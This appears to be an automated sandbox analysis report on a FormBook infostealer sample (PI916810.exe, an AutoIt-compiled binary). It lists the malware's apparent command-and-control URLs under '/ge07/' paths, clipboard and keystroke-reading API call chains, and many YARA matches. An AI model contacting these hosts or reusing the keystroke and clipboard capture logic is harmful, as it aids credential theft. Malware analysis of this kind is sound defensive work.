          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9net88.net/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9net88.net/ge07/www.lasterdeals.shop
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9net88.netReferer:
          Source: explorer.exe, 00000003.00000000.2052141439.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2052141439.000000000C860000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.azl.pro
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.azl.pro/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.azl.pro/ge07/www.ithin-ksvodn.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.azl.proReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elonix-traceglow.pro
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elonix-traceglow.pro/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elonix-traceglow.pro/ge07/www.yegle.net
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elonix-traceglow.proReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eloshost.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eloshost.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eloshost.xyz/ge07/www.lray-civil.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eloshost.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.top
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.top/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.top/ge07/www.rowadservepros.net
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g18q11a.topReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyz/ge07/www.ridesmaidgiftsboutiqueki.shop
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giyztm.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ithin-ksvodn.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ithin-ksvodn.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ithin-ksvodn.xyz/ge07/www.g18q11a.top
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ithin-ksvodn.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shop/ge07/www.eloshost.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lasterdeals.shopReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lray-civil.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lray-civil.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lray-civil.xyz/ge07/www.ool-covers76.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lray-civil.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ood-packaging-jobs-brasil.today
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ood-packaging-jobs-brasil.today/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ood-packaging-jobs-brasil.today/ge07/www.zoc-marriage.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ood-packaging-jobs-brasil.todayReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ool-covers76.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ool-covers76.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ool-covers76.xyz/ge07/www.azl.pro
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ool-covers76.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridesmaidgiftsboutiqueki.shop
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridesmaidgiftsboutiqueki.shop/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridesmaidgiftsboutiqueki.shop/ge07/www.elonix-traceglow.pro
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridesmaidgiftsboutiqueki.shopReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net/ge07/www.giyztm.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.netReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyz/ge07/www.ood-packaging-jobs-brasil.today
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wner-nyquh.xyzReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yegle.net
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yegle.net/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yegle.net/ge07/www.wner-nyquh.xyz
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yegle.netReferer:
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyz
          Source: explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyz/ge07/
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zoc-marriage.xyzReferer:
          Source: explorer.exe, 00000003.00000000.2051663367.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4496560634.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000002.4489526036.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2046728721.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000002.4492745414.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000002.4489526036.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2046728721.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000003.2422468972.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4488106924.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2045719239.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000003.00000002.4494090893.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095216810.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2422259396.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094383643.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000003.3094383643.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2422259396.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4494158240.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000003.00000000.2051663367.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4496560634.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000000.2048880486.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000003.00000000.2048880486.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004D425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_004D425A
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004D4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004D4458
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004D425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_004D425A
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_004C0219
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004ECDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_004ECDAC

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: PI916810.exe PID: 1856, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 6300, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: WWAHost.exe PID: 616, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Binary is likely a compiled AutoIt script file
          Source: C:\Users\user\Desktop\PI916810.exeCode function: This is a third-party compiled AutoIt script.0_2_00463B4C
          Source: PI916810.exeString found in binary or memory: This is a third-party compiled AutoIt script.
